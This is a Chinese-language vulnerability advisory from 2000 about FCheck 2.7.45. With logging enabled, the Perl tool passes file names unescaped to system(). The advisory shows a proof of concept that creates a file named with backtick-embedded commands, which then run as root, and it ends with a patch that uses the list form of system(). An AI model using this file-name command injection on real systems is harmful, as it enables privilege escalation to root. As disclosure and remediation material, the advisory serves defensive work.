首页 -> 安全研究
安全研究
安全漏洞
FCheck 检查shell转义字符文件名存在安全漏洞
发布日期:2000-04-06
更新日期:2000-04-06
受影响系统:
FCheck 2.7.45描述:
Fcheck是一个用Perl写的文件完整性的工具当FCheck用-l参数启动时,它会将结果发送给
syslog而不是标准输出。
它会以文件名为参数去执行一个system()系统调用,然而,如果一个文件名里包含shell
转义字符,这个转义字符后面跟着的命令将会以FCheck的运行权限(通常是root)去执行.
如果用户可以在文件系统中创建文件,而这个文件又被Fcheck检查的话,那么这个用户
就可能获取root权限。
<* 来源:Matt Carothers <matt@telepath.com> *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
[matt@shai-hulud /home/public]$ touch 'blah`touch exploit`'
[matt@shai-hulud /home/public]$ ls -l '/home/public/blah`touch exploit`'
-rw-r--r-- 1 matt wheel 0 Mar 3 21:17 /home/public/blah`touch exploit`
以root身份从/usr/local/fchceck执行./fcheck -asl .在/var/log/messages
里会产生下列记录:
Mar 4 03:24:22 shai-hulud fcheck: WARNING: File addition: [shai-hulud.telepath.com] /home/public/ [464662 -rw-r--r-- 0 Mar 04 03:18 2000 /home/public/blah]
我们可以看到"exploit"文件已经被创建了。
-rw-r--r-- 1 root wheel 0 Mar 3 21:24 /usr/local/fcheck/exploit
建议:
Matt Carothers提供了一个临时的补丁文件:
--- fcheck.orig Mon Mar 20 17:27:04 2000
+++ fcheck Fri Mar 31 18:13:38 2000
@@ -327,11 +327,11 @@
{
if($Logging)
{
- $cmd=sprintf("%s -t %s \"WARNING: [%s] %s [%s %s %s %s %s] Was modified to reflect the following: [%s %s %s %s %s]\"\n",
- $Logger, $Me, $ThisHost, $L_Name, $B_Inode, &ShowPerms($B_Perms),
+ $warning=sprintf("\"WARNING: [%s] %s [%s %s %s %s %s] Was modified to reflect the following: [%s %s %s %s %s]\"",
+ $ThisHost, $L_Name, $B_Inode, &ShowPerms($B_Perms),
$B_Size, &ctime($B_Time), $B_Name, $L_Inode, &ShowPerms($L_Perms),
$L_Size, &ctime($L_Time), $L_Name);
- system($cmd);
+ system($Logger, "-t", $Me, $warning);
}
else
{
@@ -351,11 +351,11 @@
{
if($Logging)
{
- $cmd=sprintf("%s -t %s \"WARNING: [%s] %s [%s %s %s %s %s] Was modified to reflect the following: [%s %s %s %s %s]\"\n",
- $Logger, $Me, $ThisHost, $L_Name, $B_Inode, &ShowPerms($B_Perms),
+ $warning=sprintf("\"WARNING: [%s] %s [%s %s %s %s %s] Was modified to reflect the following: [%s %s %s %s %s]\"",
+ $ThisHost, $L_Name, $B_Inode, &ShowPerms($B_Perms),
$B_Size, &ctime($B_Time), $B_Name, $L_Inode, &ShowPerms($L_Perms),
$L_Size, &ctime($L_Time), $L_Name);
- system($cmd);
+ system($Logger, "-t", $Me, $warning);
}
else
{
@@ -380,11 +380,11 @@
{
if($Logging)
{
- $cmd=sprintf("%s -t %s \"WARNING: [%s] %s [%s %s %s %s %s] Was modified to reflect the following: [%s %s %s %s %s]\"\n",
- $Logger, $Me, $ThisHost, $L_Name, $B_Inode, &ShowPerms($B_Perms),
+ $warning=sprintf("\"WARNING: [%s] %s [%s %s %s %s %s] Was modified to reflect the following: [%s %s %s %s %s]\"",
+ $ThisHost, $L_Name, $B_Inode, &ShowPerms($B_Perms),
$B_Size, &ctime($B_Time), $B_Name, $L_Inode, &ShowPerms($L_Perms),
$L_Size, &ctime($L_Time), $L_Name);
- system($cmd);
+ system($Logger, "-t", $Me, $warning);
}
else
{
@@ -404,11 +404,11 @@
{
if($Logging)
{
- $cmd=sprintf("%s -t %s \"WARNING: [%s] %s [%s %s %s %s %s] Was modified to reflect the following: [%s %s %s %s %s]\"\n",
- $Logger, $Me, $ThisHost, $L_Name, $B_Inode, &ShowPerms($B_Perms),
+ $warning=sprintf("\"WARNING: [%s] %s [%s %s %s %s %s] Was modified to reflect the following: [%s %s %s %s %s]\"",
+ $ThisHost, $L_Name, $B_Inode, &ShowPerms($B_Perms),
$B_Size, &ctime($B_Time), $B_Name, $L_Inode, &ShowPerms($L_Perms),
$L_Size, &ctime($L_Time), $L_Name);
- system($cmd);
+ system($Logger, "-t", $Me, $warning);
}
else
{
@@ -435,9 +435,9 @@
($Inode, $Perms, $Size, $Time, $Name, $CRC) = split("!", $Live);
if($Logging)
{
- $cmd=sprintf("%s -t %s \"WARNING: File addition: [%s] %s [%s %s %s %s %s]\"\n",
- $Logger, $Me, $ThisHost, $Name, $Inode, &ShowPerms($Perms), $Size, &ctime($Time), $Name);
- system($cmd);
+ $warning=sprintf("\"WARNING: File addition: [%s] %s [%s %s %s %s %s]\"",
+ $ThisHost, $Name, $Inode, &ShowPerms($Perms), $Size, &ctime($Time), $Name);
+ system($Logger, "-t", $Me, $warning);
}
else
{
@@ -456,9 +456,9 @@
($Inode, $Perms, $Size, $Time, $Name, $CRC) = split("!", $Base);
if($Logging)
{
- $cmd=sprintf("%s -t %s \"WARNING: File deletion: [%s] %s [%s %s %s %s %s]\"\n",
- $Logger, $Me, $ThisHost, $Name, $Inode, &ShowPerms($Perms), $Size, &ctime($Time), $Name);
- system($cmd);
+ $warning=sprintf("\"WARNING: File deletion: [%s] %s [%s %s %s %s %s]\"",
+ $ThisHost, $Name, $Inode, &ShowPerms($Perms), $Size, &ctime($Time), $Name);
+ system($Logger, "-t", $Me, $warning);
}
else
{
浏览次数:6903
严重程度:0(网友投票)
绿盟科技给您安全的保障